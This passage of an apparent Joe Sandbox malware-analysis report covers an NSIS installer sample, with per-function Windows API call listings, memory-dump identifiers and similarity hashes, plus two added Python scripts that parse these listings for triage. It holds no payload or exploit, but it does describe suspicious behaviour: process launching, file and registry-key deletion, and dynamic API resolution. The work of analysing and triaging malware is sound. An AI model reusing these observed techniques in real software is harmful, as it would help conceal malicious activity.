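        base=int(m["base"], 16), protect=int(m["prot"], 16),
        process=int(m["proc"], 16), phase=int(m["phase"], 16),
        dump_id=int(m["dump"]),
        rest=tuple(int(x, 16) for x in m["rest"].split(".")),
    )


def parse_dump_sources(report_text: str) -> Dict[int, List[DumpRegion]]:
    """Group every dump identifier under the image base named in the
    'Offset:' of the most recent 'Source File:' line.  The report repeats
    the same regions once per function, so duplicates are collapsed."""
    images: Dict[int, set] = {}
    current = None
    for line in report_text.splitlines():
        if "Source File:" in line:
            off = OFFSET_RE.search(line)
            if off is None:
                raise ValueError(f"Source File line without Offset: {line!r}")
            current = int(off.group(1), 16)
            images.setdefault(current, set())
        for m in SDMP_RE.finditer(line):
            if current is None:
                raise ValueError("dump identifier before any Source File line")
            images[current].add(parse_sdmp_name(m.group(0)))
    return {base: sorted(regs) for base, regs in images.items()}


def executable_regions(images: Dict[int, List[DumpRegion]]) -> Dict[int, List[DumpRegion]]:
    """Per image, only the regions whose assumed protection allows execution."""
    return {base: [r for r in regs if r.executable] for base, regs in images.items()}


# Constructed excerpt of the report's "Memory Dump Source" blocks.
SAMPLE_REPORT = """\
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
Memory Dump Source
• Source File: 00000000.00000002.12055918566.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.12055888328.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000000.00000002.12055950186.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000000.00000002.12055980900.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
"""

if __name__ == "__main__":
    for base, regs in parse_dump_sources(SAMPLE_REPORT).items():
        print(f"image {base:08X}")
        for r in regs:
            print(f"  {r.base:08X} {r.protect_name:<22} {'X' if r.executable else '-'}")
```

Run against the full report text instead of the excerpt and the output collapses to one line per region per image, which is the list you want when deciding which .sdmp files to pull for disassembly or YARA scanning; the read/write regions at 0040A000 through 00453000 are where unpacked payload data would be looked for, while only the 00401000 and 10001000 regions carry code under this decoding.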

APIs
  • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
• GlobalFree.KERNEL32(?), ref: 10002572
• GlobalFree.KERNEL32(00000000), ref: 100025AD
Memory Dump Source
• Source File: 00000000.00000002.12055918566.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.12055888328.0000000010000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.12055950186.0000000010003000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.12055980900.0000000010005000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: Global$Free$Alloc
• String ID:
• API String ID: 1780285237-0
• Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
• Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
• Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
• Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
Uniqueness
Uniqueness Score: -1.00%

APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
• GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
• GlobalFree.KERNEL32(?), ref: 004028E9
• GlobalFree.KERNEL32(00000000), ref: 004028FC
• CloseHandle.KERNEL32(?), ref: 00402914
• DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: Global$AllocFree$CloseDeleteFileHandle
• String ID:
• API String ID: 2667972263-0
• Opcode ID: f1eabbae7b06e92946478ab2060b3523c0261a503aecf3c78af0c62330ce9ec7
• Instruction ID: 1aef917cd227803a683e0008524bb9a83fcfbb8b8ade77014dfab24c7f5e3f69
• Opcode Fuzzy Hash: f1eabbae7b06e92946478ab2060b3523c0261a503aecf3c78af0c62330ce9ec7
• Instruction Fuzzy Hash: F121C172800128BBCF216FA5CE49D9E7E79EF09324F20023AF510762E1C7795D418FA8
Uniqueness
Uniqueness Score: -1.00%

APIs
• WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsi19C1.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
• lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsi19C1.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: ByteCharMultiWidelstrlen
• String ID: C:\Users\user\AppData\Local\Temp\nsi19C1.tmp$C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\System.dll
• API String ID: 3109718747-537908575
• Opcode ID: 9638f0c716bd08f9217f8ac97dbdde4665538f929ad9b7691c1d64753cc7c8ee
• Instruction ID: 0e395622636dcde05068836be4baa4a456a4d64089cc24394ac90f0f0b10d43f
• Opcode Fuzzy Hash: 9638f0c716bd08f9217f8ac97dbdde4665538f929ad9b7691c1d64753cc7c8ee
• Instruction Fuzzy Hash: A511E772A01204BADB10AFB18F4EA9E32659F54354F24403BF502F61C1DAFC9A41966E
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
• RegCloseKey.ADVAPI32(?), ref: 00402C65
• RegCloseKey.ADVAPI32(?), ref: 00402C8A
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: Close$DeleteEnumOpen
• String ID:
• API String ID: 1912718029-0
• Opcode ID: 1537f09e12a9e60e0b2a8eae30c6507c5457e656f0290ab1b216bb77a8747b60
• Instruction ID: a55e164afb4a2c5db24f06852be026e23ac61ce6859740a963365f2f7f7eec81
• Opcode Fuzzy Hash: 1537f09e12a9e60e0b2a8eae30c6507c5457e656f0290ab1b216bb77a8747b60
• Instruction Fuzzy Hash: 2F116771904119FFEF11AF90DF8CEAE3B79FB54388B10003AF905E10A0D7B49E55AA28
Uniqueness
Uniqueness Score: -1.00%

APIs
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
• GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
• GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
• GlobalFree.KERNEL32(00000000), ref: 10001642
Memory Dump Source
• Source File: 00000000.00000002.12055918566.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.12055888328.0000000010000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.12055950186.0000000010003000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.12055980900.0000000010005000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
• String ID:
• API String ID: 1148316912-0
• Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
• Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
• Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
• Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
Uniqueness
Uniqueness Score: -1.00%
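
Added example, not part of the Joe Sandbox report and not Joe Sandbox's own code: a small Python triage script that re-parses the "APIs" lines of the function blocks above (the GlobalAlloc/DeleteFileW block at 00402894, the WideCharToMultiByte/lstrlenA block at 00402583, the RegEnumKeyW/RegDeleteKeyW block at 00402C20 and the GetProcAddress block at 10001617), derives each block's "API ID" similarity key and tags behaviour from the APIs called. The key-derivation rule is inferred solely from the four API IDs visible in this section (split each API name into camel-case tokens, drop Get/To/Ex/W/A and any token present in every call of the block, bucket the rest by how many calls contain them, join buckets most-frequent-first with "$") and is an assumption about how the tool computes it, not documented behaviour; the behaviour rules are this example's own and are not the report's signatures. The sample input is copied from the report lines above. That the module based at 10000000 is the System.dll dropped under nsi19C1.tmp is an inference from the preceding block's string arguments and the dump source, and the script does not rely on it.

```python
import re
from collections import Counter, defaultdict

# Input constructed by copying the "APIs" lines of the four function blocks
# above whose "API ID" is visible in this section; blocks are separated by a
# blank line. Raw string because the NSIS temp paths contain backslashes.
REPORT_API_LINES = r"""
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
• GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
• GlobalFree.KERNEL32(?), ref: 004028E9
• GlobalFree.KERNEL32(00000000), ref: 004028FC
• CloseHandle.KERNEL32(?), ref: 00402914
• DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928

• WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsi19C1.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
• lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsi19C1.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E

• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
• RegCloseKey.ADVAPI32(?), ref: 00402C65
• RegCloseKey.ADVAPI32(?), ref: 00402C8A
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8

• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
• GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
• GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
• GlobalFree.KERNEL32(00000000), ref: 10001642
"""

# One report line: "• Api.MODULE(arg,arg,...), ref: HEXADDR"
API_LINE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Camel-case pieces that the report's keys appear to ignore (inferred from the
# four blocks above; e.g. RegOpenKeyExW contributes only "Open").
STOP_TOKENS = {"Get", "To", "Ex", "W", "A"}

# Behaviour rules used by this example (assumption: a block is tagged when it
# calls every API in the rule's set). Not the report's signature logic.
RULES = [
    ("dynamic API resolution (GetProcAddress on a runtime-built name)", {"GetProcAddress"}),
    ("registry key enumeration followed by deletion", {"RegEnumKeyW", "RegDeleteKeyW"}),
    ("file deletion", {"DeleteFileW"}),
]


def parse_blocks(text):
    """Split the report text into blocks of calls: [{api, module, args, ref}]."""
    blocks, current = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if current:
                blocks.append(current)
                current = []
            continue
        m = API_LINE.match(line)
        if not m:
            raise ValueError(f"unrecognised API line: {line!r}")
        current.append({
            "api": m["api"],
            "module": m["module"],
            "args": [a.strip() for a in m["args"].split(",")],
            "ref": int(m["ref"], 16),
        })
    if current:
        blocks.append(current)
    return blocks


def camel_tokens(name):
    """'WideCharToMultiByte' -> ['Wide','Char','To','Multi','Byte']; 'lstrlenA' -> ['lstrlen','A']."""
    return re.findall(r"[A-Z][a-z0-9]*|[a-z0-9]+", name)


def api_id(block):
    """Reconstruct the block's 'API ID' key under the inferred rule described above."""
    per_call = [set(camel_tokens(c["api"])) - STOP_TOKENS for c in block]
    counts = Counter(t for toks in per_call for t in toks)
    n = len(block)
    buckets = defaultdict(list)
    for tok, cnt in counts.items():
        if n > 1 and cnt == n:  # present in every call (e.g. Reg, Key): not part of the key
            continue
        buckets[cnt].append(tok)
    return "$".join("".join(sorted(buckets[c])) for c in sorted(buckets, reverse=True))


def tag_block(block):
    apis = {c["api"] for c in block}
    return [label for label, needed in RULES if needed <= apis]


def summarize(text):
    """Per-block triage view: address range, modules called, derived key, behaviour tags."""
    out = []
    for block in parse_blocks(text):
        refs = [c["ref"] for c in block]
        out.append({
            "ref_range": (min(refs), max(refs)),
            "modules": sorted({c["module"] for c in block}),
            "api_id": api_id(block),
            "tags": tag_block(block),
        })
    return out


if __name__ == "__main__":
    for s in summarize(REPORT_API_LINES):
        lo, hi = s["ref_range"]
        print(f"{lo:08X}-{hi:08X} {','.join(s['modules'])}: {s['api_id']}  {s['tags']}")
```

Run as `python3 triage_blocks.py`; the four derived keys match the four "API ID" values printed in the blocks above. A key built from API-name tokens survives recompilation of the same installer stub, which the instruction fuzzy hashes do not, so it is the more useful field when checking whether a block from a fresh sample is the same NSIS routine (file cleanup, recursive key deletion, plugin call thunk) or new code worth reversing.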

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
• Opcode ID: 0fd3fa23c975e38c6d473a192a1cf371983019d3a64ccaac555819f547ea3512
• Instruction ID: d5b0b812c52730b156692ce296a05b57ce8d9064807eae1c9fc7a35bbe74f0db
• Opcode Fuzzy Hash: 0fd3fa23c975e38c6d473a192a1cf371983019d3a64ccaac555819f547ea3512
• Instruction Fuzzy Hash: C7F0E172501504AFD701DBE4DE88CEEBBBDEB48311B10447AF541F51A1CA749D018B28
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDC.USER32(?), ref: 00401D59
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
• MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
• ReleaseDC.USER32(?,00000000), ref: 00401D86
• CreateFontIndirectW.GDI32(0040CDD8), ref: 00401DD1
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID:
• API String ID: 3808545654-0
• Opcode ID: 300463627e1e3070db780a64cda68b10aef53be99f4a2aa47825be2f225bc760
• Instruction ID: 1901d7d296450183f5894fa9bbb5198f988e596920eebf68b9e2cfe033e75292
• Opcode Fuzzy Hash: 300463627e1e3070db780a64cda68b10aef53be99f4a2aa47825be2f225bc760
• Instruction Fuzzy Hash: 0A016271984640FFEB01ABB4AF8AB9A3F75AF65301F104579E541F61E2D97800059B2D
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
• wsprintfW.USER32 ref: 00404A15
• SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28
Strings
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: ItemTextlstrlenwsprintf
• String ID: %u.%u%s%s
• API String ID: 3540041739-3551169577
• Opcode ID: c39695ae270452159a58bdee07ca0e289f121739e597b4873a1b490847d35dae
• Instruction ID: 0b736bf888c47b86caf201b097c22cff5488322ea99b5df57e3066faec5b3164
• Opcode Fuzzy Hash: c39695ae270452159a58bdee07ca0e289f121739e597b4873a1b490847d35dae
• Instruction Fuzzy Hash: 9011E773A041283BDB10957D9C41EAF329CAB85334F254237FA25F31D1D978CD2182E9
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
• SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
Strings
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: MessageSend$Timeout
• String ID: !
• API String ID: 1777923405-2657877971
• Opcode ID: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
• Instruction ID: 7183083e97b306686418f33f328e020de39305092e82b8c4ae23370839422ec4
• Opcode Fuzzy Hash: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
• Instruction Fuzzy Hash: 48219071940209BEEF01AFB5CE4AABE7B75EB44744F10403EF601B61D1D6B89A40DB68
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetWindowTextW.USER32(00000000,Snubbendes Setup), ref: 00403C07
Strings
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: TextWindow
                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SMGS-RCDU5010031.exe"$1033$Snubbendes Setup
                                                                                                                                                                                                          • API String ID: 530164218-2338366031
                                                                                                                                                                                                          • Opcode ID: 0db0831f5ec28912bcf09a08f50af73a8a69499f9d1cd40cf7ad1787c9be3605
                                                                                                                                                                                                          • Instruction ID: 847b53d7ec13df621055667e1e13bb36484023f01c55a5fe093bb98d5154ae24
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0db0831f5ec28912bcf09a08f50af73a8a69499f9d1cd40cf7ad1787c9be3605
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0611F035B046118BC3209F15DC40A737BBDEB8971A328417FE901AB3E1CB3DAD028B98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A0A
• CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405A14
• lstrcatW.KERNEL32(?,0040A014), ref: 00405A26
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405A04
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: CharPrevlstrcatlstrlen
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 2659869361-3355392842
• Opcode ID: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
• Instruction ID: e6cb25dffc9e5a2bb3a1dbad45cd46e4450efeecdd43702cab0598af126a0af2
• Opcode Fuzzy Hash: 50926409037afd5c3b117ee0fc1a0f088670877cc81c495d68363141157855c1
• Instruction Fuzzy Hash: 06D05E31211534AAC211AB589D05CDB629C9E46304341442AF241B20A1C779595186FE
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004051AF: lstrlenW.KERNEL32(0042C228,00000000,0041C400,75BA23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
  • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,0042C228,00000000,0041C400,75BA23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
  • Part of subcall function 004051AF: lstrcatW.KERNEL32(0042C228,0040318B), ref: 0040520A
  • Part of subcall function 004051AF: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040521C
  • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
  • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
  • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
  • Part of subcall function 00405730: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
  • Part of subcall function 00405730: CloseHandle.KERNEL32(?), ref: 00405766
• WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
• WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
• GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
• CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
• String ID:
• API String ID: 3585118688-0
• Opcode ID: 9379c59bfbec92586b7bea6de4fb4a4f736cfbaa92e5777ace76eb21c172b2cc
• Instruction ID: 5d6a9cd2629b2ba724fb53646afbed83d489e6abcf8a7a9a4f308d22f643bc11
• Opcode Fuzzy Hash: 9379c59bfbec92586b7bea6de4fb4a4f736cfbaa92e5777ace76eb21c172b2cc
• Instruction Fuzzy Hash: 2011AD31900508EBDF21AFA1CD849DE7AB6EF40354F21403BF605B61E1C7798A82DB9E
Uniqueness

Uniqueness Score: -1.00%

APIs
• DestroyWindow.USER32(00000000,00000000,00402F6A,?,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00402D9D
• GetTickCount.KERNEL32 ref: 00402DBB
• CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
• ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00402DE6
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
• Opcode ID: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
• Instruction ID: 9565580f91e6c8b036764476f8379a8a9497e0cf8b36b33943f0ae23fa557cda
• Opcode Fuzzy Hash: df109012b7806b8de8df2929ec67b86acfc6093236d2d9f47b9f955c0080d778
• Instruction Fuzzy Hash: FFF05E30501520BBC671AB20FF4DA9B7B64FB40B11701447AF042B15E4C7B80D828B9C
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Snubbendes Setup,NSIS Error), ref: 0040605D
  • Part of subcall function 00405AAF: CharNextW.USER32(?,?,0042FA50,?,00405B23,0042FA50,0042FA50,75BA3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,75BA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
  • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
  • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA
